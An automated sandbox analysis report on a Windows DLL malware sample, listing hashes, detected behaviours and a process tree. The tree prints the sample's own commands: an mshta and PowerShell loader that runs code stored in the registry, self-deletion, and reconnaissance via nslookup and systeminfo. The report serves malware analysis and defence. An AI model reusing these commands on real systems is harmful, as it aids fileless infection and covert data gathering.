Analysis
-
max time kernel
123s -
max time network
123s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
03-12-2020 11:22
Static task
static1
Behavioral task
behavioral1
Sample
15870ef831ecc0908e86ca4ff0987ff42049bbaf96ee96db2761018854b7647f.dll
Resource
win7v20201028
0 signatures
0 seconds
General
-
Target
15870ef831ecc0908e86ca4ff0987ff42049bbaf96ee96db2761018854b7647f.dll
-
Size
507KB
-
MD5
b916ccb2a2bf0381133e5b8ef9782e1f
-
SHA1
4a740790a645000119070122c710e1bac020bd25
-
SHA256
15870ef831ecc0908e86ca4ff0987ff42049bbaf96ee96db2761018854b7647f
-
SHA512
04f973bf5606bc585e9eacd2937503047b27530dfdf9a5b830fa2deb679fbbf84a9494504de6c37a8b48785dc7ccc74a1ab50b34a860729f66cdeb3bcfd2bcc8
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2040 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 816 set thread context of 1268 816 powershell.exe 11 PID 1268 set thread context of 2040 1268 Explorer.EXE 49 PID 2040 set thread context of 1492 2040 cmd.exe 51 PID 1268 set thread context of 1496 1268 Explorer.EXE 61 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 1632 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1532 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1804 systeminfo.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70aae2886ec9d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b66000000000200000000001066000000010000200000006b6abfbd0363f9073e032204315026a64893e6431536508af6833a8b84948505000000000e80000000020000200000004ca7475b4666b0a9a3b581b8d8f51f17ca3e339dcddf6b69b2c47c0785c61f4720000000b960d90c83150698942d1448a67fb0f68540891703432844bcfea48096822e2740000000ea6267237d67b0a27e30ebbb5f05cda332f5aa7c30ddcb43b8b464d9152716088fca5cf091029c551f3a86a3a3297b8e9a87254816fc1d846a479a17cf703428 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000f26553e38ecd0d5cae9b23191740d3ca543329749ad63116224f07cd7efd2f5c000000000e80000000020000200000003a53ba93681e09f6a6fc12aa4196761aa81ba42acb0b1c711941c56a20c078fe900000002a91b35c6e6cd71544b36326e001cdd1befb0705b40e2548f03ca13475c90974d064d1254d2a0bbf7a1cd9f05309378a69d1d5e306e96c67b95c9d2216a58534d30661a60b2523a94e1e54584a21a06d8671442b04ea556230c0b06a5070fb9948b652a1217636097470f186159dda782adf93b68295307cba9b9e1c1292047fd25c4851dc2e46de807db41651ac53b340000000efd24ab23aec197c61d63bd14944ef6e24da43791f769b4c28866d2a6b546d4020a7fd49b7a278c1d416954343b93f0de7b4dc9f75ae26310a2b22da82e05be6 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CCEB7631-3561-11EB-BFDD-F65A7312C48E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B066DD11-3561-11EB-BFDD-F65A7312C48E} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D9E675B1-3561-11EB-BFDD-F65A7312C48E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1492 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1492 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2032 rundll32.exe 816 powershell.exe 816 powershell.exe 1268 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 816 powershell.exe 1268 Explorer.EXE 2040 cmd.exe 1268 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 816 powershell.exe Token: SeDebugPrivilege 1532 tasklist.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1372 iexplore.exe 1900 iexplore.exe 988 iexplore.exe 988 iexplore.exe 988 iexplore.exe -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 1372 iexplore.exe 1372 iexplore.exe 968 IEXPLORE.EXE 968 IEXPLORE.EXE 1900 iexplore.exe 1900 iexplore.exe 1612 IEXPLORE.EXE 1612 IEXPLORE.EXE 988 iexplore.exe 988 iexplore.exe 904 IEXPLORE.EXE 904 IEXPLORE.EXE 988 iexplore.exe 988 iexplore.exe 1260 IEXPLORE.EXE 1260 IEXPLORE.EXE 988 iexplore.exe 988 iexplore.exe 904 IEXPLORE.EXE 904 IEXPLORE.EXE 1268 Explorer.EXE -
Suspicious use of WriteProcessMemory 129 IoCs
description pid Process procid_target PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1668 wrote to memory of 2032 1668 rundll32.exe 25 PID 1372 wrote to memory of 968 1372 iexplore.exe 33 PID 1372 wrote to memory of 968 1372 iexplore.exe 33 PID 1372 wrote to memory of 968 1372 iexplore.exe 33 PID 1372 wrote to memory of 968 1372 iexplore.exe 33 PID 1900 wrote to memory of 1612 1900 iexplore.exe 36 PID 1900 wrote to memory of 1612 1900 iexplore.exe 36 PID 1900 wrote to memory of 1612 1900 iexplore.exe 36 PID 1900 wrote to memory of 1612 1900 iexplore.exe 36 PID 988 wrote to memory of 904 988 iexplore.exe 38 PID 988 wrote to memory of 904 988 iexplore.exe 38 PID 988 wrote to memory of 904 988 iexplore.exe 38 PID 988 wrote to memory of 904 988 iexplore.exe 38 PID 988 wrote to memory of 1260 988 iexplore.exe 39 PID 988 wrote to memory of 1260 988 iexplore.exe 39 PID 988 wrote to memory of 1260 988 iexplore.exe 39 PID 988 wrote to memory of 1260 988 iexplore.exe 39 PID 1108 wrote to memory of 816 1108 mshta.exe 43 PID 1108 wrote to memory of 816 1108 mshta.exe 43 PID 1108 wrote to memory of 816 1108 mshta.exe 43 PID 816 wrote to memory of 1716 816 powershell.exe 45 PID 816 wrote to memory of 1716 816 powershell.exe 45 PID 816 wrote to memory of 1716 816 powershell.exe 45 PID 1716 wrote to memory of 1068 1716 csc.exe 46 PID 1716 wrote to memory of 1068 1716 csc.exe 46 PID 1716 wrote to memory of 1068 1716 csc.exe 46 PID 816 wrote to memory of 944 816 powershell.exe 47 PID 816 wrote to memory of 944 816 powershell.exe 47 PID 816 wrote to memory of 944 816 powershell.exe 47 PID 944 wrote to memory of 660 944 csc.exe 48 PID 944 wrote to memory of 660 944 csc.exe 48 PID 944 wrote to memory of 660 944 csc.exe 48 PID 816 wrote to memory of 1268 816 powershell.exe 11 PID 816 wrote to memory of 1268 816 powershell.exe 11 PID 816 wrote to memory of 1268 816 powershell.exe 11 PID 1268 wrote to memory of 2040 1268 Explorer.EXE 49 PID 1268 wrote to memory of 2040 1268 Explorer.EXE 49 PID 1268 wrote to memory of 2040 1268 Explorer.EXE 49 PID 1268 wrote to memory of 2040 1268 Explorer.EXE 49 PID 1268 wrote to memory of 2040 1268 Explorer.EXE 49 PID 1268 wrote to memory of 2040 1268 Explorer.EXE 49 PID 2040 wrote to memory of 1492 2040 cmd.exe 51 PID 2040 wrote to memory of 1492 2040 cmd.exe 51 PID 2040 wrote to memory of 1492 2040 cmd.exe 51 PID 2040 wrote to memory of 1492 2040 cmd.exe 51 PID 2040 wrote to memory of 1492 2040 cmd.exe 51 PID 2040 wrote to memory of 1492 2040 cmd.exe 51 PID 1268 wrote to memory of 1568 1268 Explorer.EXE 52 PID 1268 wrote to memory of 1568 1268 Explorer.EXE 52 PID 1268 wrote to memory of 1568 1268 Explorer.EXE 52 PID 1568 wrote to memory of 604 1568 cmd.exe 54 PID 1568 wrote to memory of 604 1568 cmd.exe 54 PID 1568 wrote to memory of 604 1568 cmd.exe 54 PID 1268 wrote to memory of 2016 1268 Explorer.EXE 55 PID 1268 wrote to memory of 2016 1268 Explorer.EXE 55 PID 1268 wrote to memory of 2016 1268 Explorer.EXE 55 PID 1268 wrote to memory of 1972 1268 Explorer.EXE 57 PID 1268 wrote to memory of 1972 1268 Explorer.EXE 57 PID 1268 wrote to memory of 1972 1268 Explorer.EXE 57 PID 1972 wrote to memory of 1804 1972 cmd.exe 59 PID 1972 wrote to memory of 1804 1972 cmd.exe 59 PID 1972 wrote to memory of 1804 1972 cmd.exe 59 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 1496 1268 Explorer.EXE 61 PID 1268 wrote to memory of 816 1268 Explorer.EXE 64 PID 1268 wrote to memory of 816 1268 Explorer.EXE 64 PID 1268 wrote to memory of 816 1268 Explorer.EXE 64 PID 1268 wrote to memory of 1984 1268 Explorer.EXE 66 PID 1268 wrote to memory of 1984 1268 Explorer.EXE 66 PID 1268 wrote to memory of 1984 1268 Explorer.EXE 66 PID 1984 wrote to memory of 1632 1984 cmd.exe 68 PID 1984 wrote to memory of 1632 1984 cmd.exe 68 PID 1984 wrote to memory of 1632 1984 cmd.exe 68 PID 1268 wrote to memory of 1668 1268 Explorer.EXE 69 PID 1268 wrote to memory of 1668 1268 Explorer.EXE 69 PID 1268 wrote to memory of 1668 1268 Explorer.EXE 69 PID 1268 wrote to memory of 1316 1268 Explorer.EXE 71 PID 1268 wrote to memory of 1316 1268 Explorer.EXE 71 PID 1268 wrote to memory of 1316 1268 Explorer.EXE 71 PID 1316 wrote to memory of 1488 1316 cmd.exe 73 PID 1316 wrote to memory of 1488 1316 cmd.exe 73 PID 1316 wrote to memory of 1488 1316 cmd.exe 73 PID 1268 wrote to memory of 2016 1268 Explorer.EXE 74 PID 1268 wrote to memory of 2016 1268 Explorer.EXE 74 PID 1268 wrote to memory of 2016 1268 Explorer.EXE 74 PID 1268 wrote to memory of 1224 1268 Explorer.EXE 76 PID 1268 wrote to memory of 1224 1268 Explorer.EXE 76 PID 1268 wrote to memory of 1224 1268 Explorer.EXE 76 PID 1224 wrote to memory of 1532 1224 cmd.exe 78 PID 1224 wrote to memory of 1532 1224 cmd.exe 78 PID 1224 wrote to memory of 1532 1224 cmd.exe 78 PID 1268 wrote to memory of 692 1268 Explorer.EXE 79 PID 1268 wrote to memory of 692 1268 Explorer.EXE 79 PID 1268 wrote to memory of 692 1268 Explorer.EXE 79 PID 1268 wrote to memory of 1560 1268 Explorer.EXE 81 PID 1268 wrote to memory of 1560 1268 Explorer.EXE 81 PID 1268 wrote to memory of 1560 1268 Explorer.EXE 81 PID 1560 wrote to memory of 1208 1560 cmd.exe 83 PID 1560 wrote to memory of 1208 1560 cmd.exe 83 PID 1560 wrote to memory of 1208 1560 cmd.exe 83 PID 1268 wrote to memory of 556 1268 Explorer.EXE 84 PID 1268 wrote to memory of 556 1268 Explorer.EXE 84 PID 1268 wrote to memory of 556 1268 Explorer.EXE 84 PID 1268 wrote to memory of 1720 1268 Explorer.EXE 86 PID 1268 wrote to memory of 1720 1268 Explorer.EXE 86 PID 1268 wrote to memory of 1720 1268 Explorer.EXE 86 PID 1720 wrote to memory of 272 1720 cmd.exe 88 PID 1720 wrote to memory of 272 1720 cmd.exe 88 PID 1720 wrote to memory of 272 1720 cmd.exe 88 PID 1268 wrote to memory of 1520 1268 Explorer.EXE 89 PID 1268 wrote to memory of 1520 1268 Explorer.EXE 89 PID 1268 wrote to memory of 1520 1268 Explorer.EXE 89 PID 1268 wrote to memory of 1432 1268 Explorer.EXE 91 PID 1268 wrote to memory of 1432 1268 Explorer.EXE 91 PID 1268 wrote to memory of 1432 1268 Explorer.EXE 91 PID 1268 wrote to memory of 1984 1268 Explorer.EXE 93 PID 1268 wrote to memory of 1984 1268 Explorer.EXE 93 PID 1268 wrote to memory of 1984 1268 Explorer.EXE 93
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\15870ef831ecc0908e86ca4ff0987ff42049bbaf96ee96db2761018854b7647f.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\15870ef831ecc0908e86ca4ff0987ff42049bbaf96ee96db2761018854b7647f.dll,#13⤵
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\B3914E35-76AB-5DAC-1897-0AE1CCBBDEA5\\\Adtsgsvc'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\B3914E35-76AB-5DAC-1897-0AE1CCBBDEA5").apiMbrkr))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kqc5zmdv\kqc5zmdv.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEB4.tmp" "c:\Users\Admin\AppData\Local\Temp\kqc5zmdv\CSCE8102C50FCB24E87B8E99A43D9AB554.TMP"5⤵PID:1068
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v3z2l2cf\v3z2l2cf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD01B.tmp" "c:\Users\Admin\AppData\Local\Temp\v3z2l2cf\CSC4F2AEBEAF7A94D53A280E7E677E40A9.TMP"5⤵PID:660
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\15870ef831ecc0908e86ca4ff0987ff42049bbaf96ee96db2761018854b7647f.dll"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1492
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\8D1C.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:604
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D1C.bi1"2⤵PID:2016
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1972
-
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1804
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1496
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:816
-
-
